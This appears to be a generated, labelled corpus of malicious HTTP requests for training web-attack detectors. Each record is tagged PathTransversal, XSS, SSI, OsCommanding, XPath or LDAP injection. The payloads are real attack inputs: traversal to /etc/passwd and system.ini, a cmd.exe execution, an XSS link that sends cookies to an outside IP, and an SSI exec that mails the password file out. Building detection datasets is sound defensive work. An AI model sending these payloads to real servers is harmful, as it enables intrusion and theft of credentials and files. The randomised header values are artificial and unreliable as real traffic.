Proxy-Authorization: Basic b2Rlcmw6cEVobFN1aHM=
Authorization: ftsb tthhtw=otis
Range: 20-48,0-277881
Referer: http://2oitJnme.gov/foitnn6.mp3
TE: trailers,trailers
Trailer: Warning
User-Agent: ArraUtasalc7lseefd
UA-CPU: MIPS
UA-Disp: 3246,785,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 6084x210
Via: a4ytq/6.6 159.81.21.176, yue/1.8 www.gnnmiwy.html, HTTP/8.1 www.4vlda.shtml
Transfer-Encoding: deflate
Upgrade: drf/1.3, eoe/9.9
Warning: 882 118.217.63.222 "etpoiZeexEopAili8v" 
X-Forwarded-For: 62.58.132.17
X-Serial-Number: 8223453
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45496
Start - Id: 45887
class: PathTransversal
GET /eoravmDtet/x5G4_2mM@.ZH5LPYO/@Pqnph-xHRG2lkbetweenI/cmugalhmph/5Lfte-.asp?wszcqquyde=..%5C..%5C..%5C..%5C..%5C..%5CWINNT%5Csystem.ini HTTP/1.0
Host: www.ue9e.cz:7
Connection: close
Accept: */*
Accept-Charset: x-mac-turkish;q=0.4, koi8;q=0.2, x-mac-ce;q=0.1, shift_jis, x-mac-ce;q=0.3
Accept-Encoding: *;q=0.8
Accept-Language: geS-ewtgozen
Cache-Control: no-store
Client-ip: 28.134.204.98
Cookie: xzniHaniee=92;biucl=ok4C7I;oYoNc=open$6R;ntgsAUe3=ehO;gOK7ncr4C.Z9G=dx
Cookie2: $Version="33"
Date: Thu, 14 Oct 04 20:52:16 UTC
ETag: W/"@9PfQx8cIAjptFMfc"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Sat, 27 Mar 04 01:55:03 CET
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: *
If-None-Match: *
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 434
MIME-Version: 5.1
Pragma: q=naa
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: RsBe h3em=leSos5t
Range: 81947-,357703-
Referer: /oeti/adhHge/dt9d.pl
TE: trailers
Trailer: TE
User-Agent: Mozilla/4.5 (X11; U; Linux i386 3.0; ew-oa; rv:8.4.8) Gecko/01358789
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: srd/2.1, trlx/7.5, fh7e/2.0, xDtero/2.4
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45887
Start - Id: 48898
class: XPathInjection
GET /uPbSaZcd7vB/owM1UnMmC/XucC/uEtmldHi6meits3ae7gv/8gZJYl6Vwm/un/trdtd6hs/entai0m/6d0d/3giHtestoaeitEn62ntm.cfm?xenaA08=eda74hm4o7pU2+&8object8NMYYwget8QWq=Eme3eeiu%27+++++or++++count%28+++path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i+%2B+j++%2B+++k++++%2B++++l%2B+1%29%5D++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+or+++%27jwm%27++++%3D+%27++v4enh%27+++or&@HBYQFe=0&fqrn7ee18t9aZfl=0%28d&lth8m6hsev6onte=rhahq&tontebhE=aed&orwgudoeT=dt2arara33sac&nia7m=54899&7lfLYHD2PFbD=tB%406w2NUz&adminzyAZUUahaving=C7sHemu3loxer&rasiz3euIe=rLO48QOU HTTP/1.0
Host: 47.82.222.58
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-turkish;q=0.2, utf-7, koi8, x-mac-greek
Accept-Encoding: 
Accept-Language: kp1i5ha-eaavhhz, nto28l-eeeh
Cache-Control: no-store
Client-ip: 153.160.118.93
Cookie: cl=osV;5mje=saGtTsakpnt
Cookie2: $Version="62"
Date: Fri, 08 Jul 05 19:35:57 CET
ETag: "_HQ8LHNG-3oa4B2l"
Expect: doeh2s
From: ge7m@nttgt.gov
If-Modified-Since: Sun, 08 Nov 09 08:18:21 CET
If-Unmodified-Since: Mon, 16 Apr 07 06:53:09 UTC
If-Match: "bE3HV.B4dO84C3qwh"
If-None-Match: "ZyzK5c.Tj9h7vVT"
If-Range: "cpyrrq6ZO6pNfNk8Iz"
Max-Forwards: 348
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: NTLM bWFzZmV0ZWV0N3FlZWl3c2Fsa3NucmNodnNUeVJpcnJldEU5MXU=
Authorization: Basic ZTZhZTo1dXRvZHBh
Range: 87-22
Referer: http://owerds.be/a2ieuoo4/owow.tar
TE: chunked;q=0.1
Trailer: Warning
User-Agent: EhSseTBb7/3.8.6.1.9
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 978x515
Via: 6.5 www.rsvjbss.tiff, FTP/4.5 www.tgebnt5.png, 1.0 www.Rtasne.jpg
Transfer-Encoding: deflate
Upgrade: wagnk/0.9, aebao/4.3, 7ip/5.1, ttd/1.5, iI1eI/9.7
Warning: 712 39.177.49.129 "e9wsavnreymOd" "Wed, 28 Jun 06 09:25:28 CET"
X-Forwarded-For: 89.218.173.144
X-Serial-Number: 045358782240634
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 48898
Start - Id: 46895
class: XSS
POST /xE9oyA8diIzs.png? HTTP/1.0
Content-Length: 189
Content-Language: eaotvd8,I6c
Content-Encoding: identity
Content-Location: /euA7rvz.mdb
Content-MD5: amVmdTZnN3FScnJsN2xuNA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 03 Feb 09 06:47:09 CET
Last-Modified: Thu, 18 Aug 05 09:39:03 UTC
Host: www.nkns.fr:05380
Connection: close
Accept: */*
Accept-Charset: windows-1254, x-mac-chinesesimp;q=0.8, iso-8859-8-i;q=0.5
Accept-Encoding: 
Accept-Language: 10q6a-re;q=0.5, 2hsiii-ctooR, NO-qrmqc;q=0.7
Cache-Control: no-cache
Client-ip: 165.85.124.10
Cookie: dPo=yFL7Yn8sjtuI
Cookie2: $Version="07"
Date: Sun, 04 Apr 10 06:57:16 GMT
ETag: "PfI32g8MOmatvmWLH"
Expect: 100-continue
From: nbfea3@yM2KA0.biz
If-Modified-Since: Mon, 21 Aug 06 24:06:10 CET
If-Unmodified-Since: Thu, 16 Jun 05 05:46:25 UTC
If-Match: "pnDiXMSWaz02KzTcSk-2"
If-None-Match: "EB1l2_cSfXqNpRA"
If-Range: *
Max-Forwards: 73
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest nc=AcC43dEf
Authorization: f77db aetmsn=Lobo5twv
Range: -1
Referer: /jz2llz/meye.php
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: nRhY2Tao http://www.tiehmfe.uk
UA-CPU: MIPS
UA-Disp: 457,6373,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 8473x700
Via: HTTP/1.0 97.43.126.64
Transfer-Encoding: tgnE; khhfc9=nsheti
Upgrade: c7hl/0.0, ojnjz/4.8, sotds/6.5
Warning: 749 124.119.94.150:741 "rcapb76l7ke" "Tue, 13 Dec 05 01:19:14 GMT"
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 93268691782079750245
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~

e7wiproEllea=hsperekao7)n&osrdf=<a href  =    "javas&#99;ript&#35;[window.open('http://253.178.191.27/eranon.mspx'+document.cookie);]   "   >

End - Id: 46895
Start - Id: 44901
class: PathTransversal
GET /oHDrEp@WTJ0Srd7fnqr.msf?-oFL9vMx=iNot9weneatxn2Td&nhn2a0oa=5644978885&w6po8ftic8iaem=54884&dlsibCV5Lh=rgtFeeeeairxwOrSsa&woMlewYanoen8=541632&O0=19000011&tbiioa=elrcsehttpssner&UO8EoTq7WdropxL=file%3A%2F%2F%2Fk%3A%2Fc2gxb%2Fhe%2Fbhtie.xml&ea8e=nw12&eDmnwcch=eztDHosnzfni%5Ci&Rzr=l4erEoisbz9tdretre&AcatSFAY26D=yrobPL&ejiE0lh=ht%24scnchi HTTP/1.1
Host: 169.200.236.197:80
Connection: ijMN
Accept: */*
Accept-Charset: iso-8859-15;q=0.2, cp-950;q=0.0, euc-kr;q=0.7, iso-8859-6
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 139.102.255.156
Cookie: tipfldua7sit==re[>isOuTy>epuF;ltTirtphrpwhb=msuqTohftu
Cookie2: $Version="171"
Date: Tue, 03 Oct 06 14:31:05 UTC
ETag: "4HBE8n8.L-wVqUCHLJ8L"
Expect: s0deb=TEis;b9a59a
From: ossdo1d@eovryuBei.be
If-Modified-Since: Wed, 09 Dec 09 18:38:42 UTC
If-Unmodified-Since: Sat, 16 Oct 04 03:34:08 CET
If-Match: *
If-None-Match: "RZKf_2LcaIqpyHFCla"
If-Range: *
Max-Forwards: 2
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: Digest realm
Range: 78821-,-584,26-7
Referer: /maEi/OoAu/ejesaTqp.nsf
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/3.0 (Machintosh; U; PPC Mac OS X 7.4; ay-lr; rv:1.7.1) Gecko/14634215
UA-CPU: StrongARM
UA-Disp: 7572,678,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 6797x3315
Via: HTTP/4.3 116.247.21.28, Enh/6.9 21.51.91.144, 7.1 111.79.44.35:3302
Transfer-Encoding: znxu
Upgrade: bSv/3.5, tpb/0.4, sbReuF/5.2, taf/0.6, 3ghel/8.4
Warning: 647 www.4rtd.shtml "hrxe" "Sat, 11 Oct 08 22:03:34 GMT"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44901
Start - Id: 36268
class: PathTransversal
POST /zrykNuXQZRFyOVb_C/a3hSSeTraz4lthyT/eeoms/ts/eLd@C7S8.tiff? HTTP/1.0
Content-Length: 184
Content-Language: netotev
Content-Encoding: compress
Content-Location: http://www.teoaoe.uk/pxdmtnen/habtah/qnnir.pdf
Content-MD5: ZTk2bjVOT2JsZWtzc2p0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 24 Feb 08 14:10:55 UTC
Last-Modified: Sat, 10 May 08 07:50:45 UTC
Host: 218.184.97.251:80
Connection: close
Accept: audio/x-wav
Accept-Charset: gb2312;q=0.0, euc-cn;q=0.2, x-mac-chinesetrad
Accept-Encoding: 
Accept-Language: h-tnhcd;q=0.1, S3-xonrrb;q=0.1, oAusrn-lcl2n, yt-ib, ei-a;q=0.3
Cache-Control: no-cache
Client-ip: 112.174.108.236
Cookie: pi4tyea=61;6wtHcIpa=njo
Cookie2: $Version="960"
Date: Sun, 28 Jan 07 23:21:38 CET
ETag: "chge_SE4pOUCfVI8PIm"
Expect: aPdn
From: h4lVt@earfemtsac.org
If-Modified-Since: Fri, 12 Oct 07 17:24:50 CET
If-Unmodified-Since: Wed, 20 Jan 10 22:09:36 CET
If-Match: "h8EwK8Zt4nv0SI7nlKMw"
If-None-Match: *
If-Range: Sat, 08 Nov 08 04:54:59 GMT
Max-Forwards: 98
MIME-Version: 7.1
Pragma: no-cache
Proxy-Authorization: NTLM YUFJdXVhaG5zZTJuY3RpY2U5Yml0emVUbnJpdXR3YXQ1bmFjd280dw==
Authorization: NTLM ZU1ta28zbnVhaWVidXRzZWVNbmNubjVTZXhzYW9oaWFleGVuYU1vdEE=
Range: 52-067988,48957-
Referer: /Iree0e/Unraii/f6atbdsa/ef4o.jsp
TE: trailers,chunked,deflate
Trailer: Via
User-Agent: lYmVnK http://www.utfvau.st
UA-CPU: PowerPC
UA-Disp: 159,531,32
UA-OS: Mac OS X
UA-Pixels: 274x803
Via: 9.3 www.ete3T.css, 2.7 34.87.115.152
Transfer-Encoding: deflate
Upgrade: ensibi/4.7, tetheo/8.4, iarhfi/9.3, lh4tm/2.6
Warning: 120 183.198.212.10 "5hoema" "Mon, 27 Nov 06 04:28:46 GMT"
X-Serial-Number: 708089043409657
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

eY.HIBZmY=o6fl&e0t=\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html

End - Id: 36268
Start - Id: 40681
class: SSI
GET /iXxW2AHQdocumentdHq/usueG8anednj78ta/ltrNhhentatrdsIe/nean/wt.Z8/eRnotoede/s@mwLUzuaLJ5SVLK./p0T-7@a7DYC0HuB.QG/ew4Dz.css?tyusedtlNst7Hdo=85830&rEBtrlao=ibSx3TRN&ne5o=onIe0onm0s06e&-54MeX1.RfQ=iqexecfe&ptejrh=bgntwnxj%3Aeufrh&5Nei@VB0httpEg=ja%3B&taptbw=edev&g6G=mr7orj&htaccesWRw=e%3Ds15iiselectUc&48i75SsaiNW=drT&foFbioXsn=e7PwT&zNn0aF41W5np=%3C%21--%23include+++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+--%3E&etaewdwe8=201148 HTTP/1.1
Host: www.ceIeo.uk:4331
Connection: keep-alive
Accept: */*
Accept-Charset: us-ascii, koi8;q=0.6, cp-932;q=0.5
Accept-Encoding: 
Accept-Language: nfAmenia-o;q=0.3, ko-uoearst
Cache-Control: max-age=6
Client-ip: 59.227.224.32
Cookie: xrzsneOktnshtws=414;mehsgarXwiEely=9i;pynombol=lNstbars4fmhrera;tqteqef7ewg2zn=eJnointoeEiiheoets;1hclrqr=e.iCg0iie
Date: Sun, 08 Mar 09 03:03:28 CET
ETag: W/"nQowONbBuqGBRqoN"
Expect: a7cn
From: kyipfoyn@ugT7me.be
If-Modified-Since: Sun, 07 Jun 09 13:58:06 UTC
If-Unmodified-Since: Mon, 10 Sep 07 04:09:34 CET
If-Match: "99O..PUVgPiAO.3-gk4"
If-None-Match: *
If-Range: *
Max-Forwards: 76
Pragma: mtpBst='5ha'
Proxy-Authorization: Digest realm
Authorization: NTLM dG91cm85YW9hZ2lldW9tbDZnZWl0NTk0aGZ2bWViOTVsdGVZNTY3enJydm4xZWVy
Range: -41940,-0
Referer: /oknsgn0i.tiff
TE: trailers,chunked;q=0.1
Trailer: Host
User-Agent: 2rFill5r7un
UA-CPU: StrongARM
UA-Disp: 854,3532,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 106x2848
Via: 5.6 www.i7bcEo.png:2, ieno/6.2 www.tqvenf.css:28216, 9.9 www.naeq.shtml
Transfer-Encoding: gzip
Upgrade: 2vu/5.3, otv/1.9, eEln/4.0, xlziey/0.0, f5sv/6.9
X-Forwarded-For: 199.225.165.233
X-Serial-Number: 017478485639
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40681
Start - Id: 44384
class: OsCommanding
GET /data/..��../..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.issdfnfois.uk:80
Connection: close
Accept: */*;q=0.7
Accept-Charset: iso-2022-jp, x-mac-ce, windows-1251, x-mac-greek
Accept-Encoding: gzip;q=0.6
Accept-Language: e-itnte, 1flnee-iod
Cache-Control: no-store
Client-ip: 25.151.126.170
Cookie: Levali3Azc07p=hxKyH;e7mtzdemeWthe=eXH5r;tleshh=dlTwhl;odstt6e=ruea;hBCq=nqrdEvf?psa6sw;aglsOseRtoe43=eWUe
Cookie2: $Version="962"
Date: Sat, 15 Sep 07 01:23:07 GMT
ETag: W/"obTbaYx6BR7gH4UQQTN9"
Expect: 100-continue
From: tdMWtde@lyHrvnefs.fr
If-Modified-Since: Mon, 23 Jun 08 11:44:47 UTC
If-Unmodified-Since: Mon, 03 Nov 08 02:01:35 GMT
If-Match: "T4zlc4FMAAGr3y8"
If-None-Match: "dcNs23J-dHPSJRW9"
If-Range: Sat, 24 Jun 06 20:55:00 GMT
Max-Forwards: 6
MIME-Version: 1.4
Pragma: T='idt'
Proxy-Authorization: omh4 yAzTEa=ty8o
Authorization: Digest nc=E88c7DfF
Range: 628-05998,-0119,3-35794
Referer: http://omsx1.gov/Acne/seid/ires.mp3
TE: trailers,chunked;q=0.5
Trailer: Proxy-Authorization
User-Agent: d3hAa (mylHi.tO; hfiOZCdzS; s1hOth)
UA-CPU: Sparc
UA-Disp: 9663,2173,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 8335x3340
Via: 2.5 149.98.207.116:1561, HTTP/6.9 150.154.217.84:04
Transfer-Encoding: identity
Upgrade: sltIe/4.5, 7smi/8.6, fir/0.7
Warning: 551 92.44.38.235:34239 "tifgnertsiaoesxw" 
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 16212196997401300
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44384
Start - Id: 37498
class: LdapInjection
GET /gUqu_-GR/yJ2formpZlOlib/eU1/ohtpassvuYtXfOjx8Gmeta/Iuyneeb5vrst2/ustgctoe2godeeye/ze.php?rhiarhIeeoe=zsA&ue74ckNrneaisen=eueHaottieAi8el2za&8rOz=05&iup0smuw=echli8citiateir&ghPhelR1ii=n%26rj&group byMFVKjq2=a8tmp&eaeardigAargth=636855&4etn5Hptxegtnu=iPiQ2ZB&tA3=54279&e7=svNP&10W3NTPpE=divlibeotxCnAtmpka&senpyrTrml3arz=r&depc=760&eoInaiiieet=124586099&FqYslexeckq=%27ae HTTP/1.0
Host: 155.63.234.230:7
Connection: close
Accept: text/xml;q=0.5, application/*;q=0.1
Accept-Charset: x-mac-japanese, iso-2022-jp, x-mac-chinesetrad
Accept-Encoding: identity;q=0.8, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 120.138.173.180
Cookie: 2noit6=785973;eItgye=18)(&(objectClass=1ece)(|(sn =  ea)(cn=evr  J*));estocar=4;eh=c
Cookie2: $Version="03"
Date: Fri, 21 Oct 05 04:08:31 UTC
ETag: "UGQgKbDRrlW4GtQ"
Expect: 100-continue
From: esithiaa@tkeoab.be
If-Modified-Since: Tue, 20 Sep 05 24:22:51 UTC
If-Unmodified-Since: Wed, 25 Feb 09 04:54:47 CET
If-None-Match: "vWZ1_BnbQfENkPd"
If-Range: Thu, 24 Feb 05 03:40:04 UTC
Max-Forwards: 510
Pragma: no5zds=8wvtis
Proxy-Authorization: NTLM dzkzaW83b2JvZW85SWtJZHRFcmgxYWpvclQyNnR1OXVsdWY1dA==
Range: -704
Referer: http://erfaEe.gov/ptfe5se/Rltti7in/deAswh/9gavesu/eforl5it.mdb
TE: deflate;q=0.0,trailers,trailers
User-Agent: nFgs (qXxyfh58gd; aFwpV4; xGh.x.@)
UA-CPU: x86
UA-OS: Windows 98
Via: 5.1 www.ilwta.htm
Transfer-Encoding: 3ttdt
Warning: 009 102.103.7.24 "Steob" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 37498
Start - Id: 45412
class: PathTransversal
POST /okoeaiwilltsh/t8eeufe7644cgoaod/0UeOqjP.html? HTTP/1.0
Content-Length: 266
Content-Language: esjhv,aqT
Content-Encoding: gzip
Content-Location: http://epri7t.de/Ibpsh/otaltnn/lhsMjGfa.swf
Content-MD5: eWF0U3VSc2V1dGlhbXRobw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 05 Mar 08 24:09:24 UTC
Last-Modified: Fri, 28 Mar 08 10:03:27 UTC
Host: 5.181.159.92
Connection: snso
Accept: application/rtf
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 147.195.122.195
Cookie: swhhlsoanolc=xtermeewget3tq%e;ssylqlrotsiu=253816321;eedkwn7nfci=5301;positionrNJd= h
Cookie2: $Version="227"
Date: Thu, 20 May 04 23:29:41 CET
ETag: "h2GELE9QWj0NUvazBiN"
Expect: 100-continue
From: d1Subs@Oaeelb.fr
If-Modified-Since: Sat, 28 May 05 04:10:57 UTC
If-Unmodified-Since: Sun, 19 Apr 09 13:57:57 GMT
If-Match: *
If-None-Match: "ZyM0YzM6F1Vm2sLWX@Z"
If-Range: Sat, 16 Dec 06 24:14:16 GMT
Max-Forwards: 565
MIME-Version: 8.1
Pragma: no-cache
Proxy-Authorization: eOpgl ldhoil=meunte
Authorization: Digest uri=/rerrx/d7rscBo.bin
Range: -40
Referer: /c1du/aynonohe/mthUerc/aEisF.css
TE: deflate,trailers,trailers
Trailer: If-Unmodified-Since
User-Agent: cxqiraB5la
UA-CPU: PowerPC
UA-Disp: 3117,4265,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 863x2272
Via: 4.3 www.lieir.js:2558, 1.1 201.241.148.50:59
Transfer-Encoding: gzip
Upgrade: nhl/2.2, iq1t/0.4, vahc/6.4, rxeb/7.3, E6nr/6.9
Warning: 226 191.247.153.35 "oywrpbp" "Tue, 07 Jun 05 04:43:35 GMT"
X-Forwarded-For: 88.16.159.203
X-Serial-Number: 7007774658100
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yhmearey=/../../../../../../../Inetpub/iissamples/olille/li/es/si.cfm&Ehib=8746768&alwoo02l=qstaM6eoiRhe&oe3j7.v=92&CP8JWuUOj=oinsertj/&eu=:ricatenoeaRu0i3&hdei=s3Q0rUE&dmiB0lc=66&rtlu=1khIaEdesEo@et&dt=ns0aMtncI8bh&shxuoo6=eaNcaXn_.2

End - Id: 45412
Start - Id: 40831
class: SSI
GET /cT9Y_q@2/bodyYbodyIo0d9yt8FB3D-/sQ@aQ/hiyttnnmcd/EyinaaTcnrfca7me/I8pneriicbla/sadi9tpx7psncoseoy1a/eme5aga1ou/ek1K.msgYj/lsBips9lNDga3pysystem.asp?4lvx=a%295t9Ess%3By&Nnph-form6=gbCTCxv85GYC&fb8=aIB&ekkrtaEi=%3C%21--+%23odbc++statement%3D++%22select++++wNeh2iH%2C+++++tt2hygai%2C+++++itSoil9+++from+gssoo+++++order+++++by++++8%2C+67%2C++5%22++++--%3E HTTP/1.0
Host: www.ayrtB.fr
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: ta6a-xnsivREi, gmushzo-ichi;q=0.4, sSU-Klari, i3-o7;q=0.4, nvk0ges-uaR
Cache-Control: only-if-cached
Client-ip: 243.167.247.234
Cookie: ad=w.S;sd=j;s8mntvPnncaeEl=563338
Cookie2: $Version="4"
Date: Fri, 26 Dec 08 02:38:17 UTC
ETag: W/"@ygQvx5XKQ4FDOQ2"
Expect: oulsi
From: heeo2q@daRia.de
If-Modified-Since: Wed, 26 Sep 07 05:29:03 UTC
If-Unmodified-Since: Fri, 20 Mar 09 13:48:03 UTC
If-Match: "Jo7ny@NkLhw3Y-@ghQ@"
If-None-Match: "rZc1_isaOo7r18Hs."
If-Range: Mon, 18 Feb 08 04:09:16 CET
Max-Forwards: 4632
MIME-Version: 0.3
Pragma: tgae=uj
Proxy-Authorization: Basic MWFhVG1EOnNsZW9l
Authorization: Basic T2FudGFoOm90Z3hsZW93
Range: 4-703669
Referer: /eeEocdO8/dEei.wav
TE: gzip;q=0.0,gzip;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.5 (compatible; MSIE 9.2; Open BSD i586; kmetlchshh)
UA-CPU: PowerPC
UA-Disp: 7808,940,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7606x249
Via: FTP/2.2 164.251.101.92, HTTP/3.4 246.153.35.173, FTP/0.5 www.edattOt.png
Transfer-Encoding: identity
Upgrade: aBsae/7.5, Ars/0.8, 2ba7f/1.4, ikeqi/5.4
Warning: 943 www.nneettw.tiff "el9tus" 
X-Forwarded-For: 213.213.96.18
X-Serial-Number: 40747153756954
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40831
Start - Id: 40079
class: SSI
GET /n6aN.ogjTHVvB/5y@9p/sX4EJwjzW7vvik@qt/Fh8S9xk98Oscript/rc8ZCxbHOJ/o1aiuprsloRhsbu7Tt/n9hY8fkq2L/pnr5n1rSnHeeT2/nV/hP8YFXg-/e8xN/dfeseu0vesoo2.mspx?vpcoo7rveu=%3C%21--+%23exec+++cmd%3D%22%2Fbin%2Fmail++++eo70rdE.com+++++%3C+%2Fetc%2Fpasswd%22--%3E&eAoenaea=29&Juy2whereGX1=2080&nueteeiEboyo6na=AtOeu HTTP/1.1
Host: www.z4pij.org
Connection: Sytsenf
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.6, identity, deflate
Accept-Language: hwa-se6
Cache-Control: min-fresh=324
Client-ip: 53.190.46.19
Cookie: eiA=43;LAguYcBQ9Yib=4967007
Cookie2: $Version="642"
Date: Thu, 29 Sep 05 02:25:38 GMT
ETag: "zpw2OwFuO-yaWgtlF9eB"
Expect: 9fca=ulatc;2dTfm8
From: hbdwf2hh@oEzag3e7.de
If-Modified-Since: Thu, 11 Feb 10 08:25:09 UTC
If-Unmodified-Since: Sun, 19 Dec 04 11:02:49 GMT
If-Match: *
If-None-Match: "G7FuLiIbUH4fToO"
If-Range: Sun, 21 Nov 04 11:37:57 UTC
Max-Forwards: 5
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: tk5tph hFlgrdtC=taleir4
Authorization: Ezs6u annenrv=oIrt1oH
Range: 4-,3-,-4
Referer: http://www.yiirbes3.fr/dusronct/uenobt/n5oNeasb.aspx
TE: trailers,trailers,deflate;q=0.7
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.4 (compatible; Konqueror/3.7; Win 9x; amrtmaO; oa5ty)
UA-CPU: PowerPC
UA-Disp: 097,3565,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0944x596
Via: 5.6 22.105.75.198, HTTP/8.3 178.233.163.162, i0ti/5.2 65.50.237.6
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 187 www.s2nfht.shtml "Idhcekl" 
X-Forwarded-For: 133.223.4.65
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40079
Start - Id: 44893
class: PathTransversal
GET /ei6mINnBrlunet3f/m0VTRd/eNmeniie/sswszdUyI2ocy/i.y83NRhbA/nemar8bwc/aMY/gTU3e@Ha.png?b4NpF=4VnAITV&tanxhtrtawaoo=mahotn%3Bms6&eo=0e%5CShrformnmhi+kit&cTUn=wti&r7pceHi=83&H9yMYaCQGQ-D=ms8n&W2a@QSpassthrugy=collection%28+++file%3A%2F%2F%2Fc%3A%2FNm%2FaSda.xml%29&vyaccess_logsamofqa@piI=ltljTg&s8hlrcuoapayeho=cobe&NHY-oN=1624762&9jEKEW@@zx.4=2892317&nlT4n=3926&bTNvetMbps=h2e&ispaatht=djVrkQ&ashqdRsy1bdsv=f HTTP/1.1
Host: www.zln6t2ome.cz
Connection: iloopi2
Accept: */*
Accept-Charset: iso-8859-1, x-mac-roman;q=0.3, iso-8859-4;q=0.4, x-mac-japanese, iso-8859-15;q=0.7
Accept-Encoding: 
Accept-Language: u3susm-oxlE
Cache-Control: no-cache
Client-ip: 45.33.101.245
Cookie: aeeytni3ciUrae=bUaeEilxsteheei
Cookie2: $Version="65"
Date: Wed, 15 Nov 06 04:35:12 GMT
ETag: W/"tIHhbmSuiGV1mULHe7Fs"
Expect: eaqhh8
From: tshh@2vatra.org
If-Modified-Since: Sun, 08 Feb 09 22:28:32 UTC
If-Unmodified-Since: Sat, 05 Nov 05 08:41:55 UTC
If-Match: ".JNcQ3VrQ36Ujie"
If-None-Match: "U8pArl3Dh-qGpG8b5-U"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="nwijehr"
Authorization: NTLM ZG93bmRvZXJzaWN0ZUx0ZVRlMGtvZUw1cmFzZWVmcHQ4SDcw
Range: -129
Referer: http://www.unatOSh.ch/ae1fiq6/lohyn6/94tiohl9.php3
TE: trailers,chunked
Trailer: Warning
User-Agent: isvWSzAK62 http://www.aha4.de
UA-CPU: x86
UA-Disp: 4734,136,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 6797x3315
Via: FTP/3.6 www.smxsHw.jpeg:54
Transfer-Encoding: identity
Upgrade: yr2s/6.7
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 055847
----: ----------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 44893
Start - Id: 46594
class: XSS
GET /ekn7oihsrrae/e2x/oySR/ewGk2jxWlv-qF/nt6heLbuohe5pa/hyphw4ped/xt2gec/J8objectDM/rScB4rWJ1RTVt8/tmtyannxxPnsv.pl?l3jta2dat=7942477&oldll6s=nRtxPmrct8T&rowapilmnmlis=e2h&cad7=4967&mihtento1saynse=wRehtsuhiinz&6trtqalnoetA=rhtd&MIRcopyTWo9=netcatbn5&pt0xtermTqmochaPxAsn=ina98jeD HTTP/1.1
Host: 230.248.145.151:132
Connection: close
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
